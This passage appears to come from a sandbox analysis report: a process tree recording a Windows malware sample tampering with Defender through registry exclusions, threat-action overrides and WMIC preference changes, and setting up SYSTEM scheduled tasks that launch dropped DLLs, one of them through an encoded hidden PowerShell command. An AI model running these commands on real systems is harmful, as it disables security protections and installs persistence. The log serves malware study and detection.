                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1796
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:3036
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2400
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                          PID:1708
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                            PID:1108
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                            4⤵
                                                                                                              PID:536
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                              4⤵
                                                                                                                PID:2016
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                4⤵
                                                                                                                  PID:1816
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                    PID:1948
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:1936
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                        PID:2264
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:1268
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                                          4⤵
                                                                                                                            PID:1544
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                            4⤵
                                                                                                                              PID:3028
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                              4⤵
                                                                                                                                PID:2216
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:1660
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  4⤵
                                                                                                                                    PID:2828
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:1820
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      4⤵
                                                                                                                                        PID:2592
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        4⤵
                                                                                                                                          PID:2028
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          4⤵
                                                                                                                                            PID:2564
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "ggMxgUjGp" /SC once /ST 00:27:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                          3⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1832
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "ggMxgUjGp"
                                                                                                                                          3⤵
                                                                                                                                            PID:2388
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "ggMxgUjGp"
                                                                                                                                            3⤵
                                                                                                                                              PID:2636
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2240
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1068
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2616
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2612
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:23:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exe\" 0c /vBWPdidUO 385120 /S" /V1 /F
                                                                                                                                                      3⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:2188
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2764
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 240
                                                                                                                                                        3⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:2292
                                                                                                                                                    • C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exe
                                                                                                                                                      C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exe 0c /vBWPdidUO 385120 /S
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:1600
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2808
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2112
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:696
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:1960
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:912
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2952
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2304
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1776
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2548
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:292
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1320
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2804
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2628
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1772
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:576
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:556
                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:1852
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:796
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1352
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:712
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:408
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:1636
                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1108
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1940
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:3020
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1556
                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1540
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\LaAZwT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1972
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\hJTohrj.xml" /RU "SYSTEM"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:2320
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /END /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2324
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2204
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\MrbggDq.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1588
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\prQdquS.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:3032
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\vFloWYX.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:808
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\zKIdGvm.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:2816
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:06:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll\",#1 /FatdidvA 385120" /V1 /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1572
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2404
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3044
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1524
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:2668
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll",#1 /FatdidvA 385120
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2420
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll",#1 /FatdidvA 385120
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:2016
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2596
                                                                                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                            taskeng.exe {D562C738-E88D-4855-85F4-86F13C3FCB40} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1668
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:296
                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:1752
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1296
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
